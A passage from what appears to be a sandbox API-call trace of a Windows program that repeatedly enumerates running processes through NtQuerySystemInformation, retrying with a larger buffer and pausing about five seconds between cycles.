ResultLength=0x0) returned 0xc0000004 [0242.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.921] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.939] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.949] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.958] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.967] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.978] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0242.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0242.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0242.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0242.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0242.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0242.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0242.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.008] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.020] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.048] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.068] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.069] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.070] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.077] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.095] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.104] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.114] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.117] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.123] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0243.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0243.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0243.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0243.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0243.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0243.134] NtAllocateVirtualMemory (in: 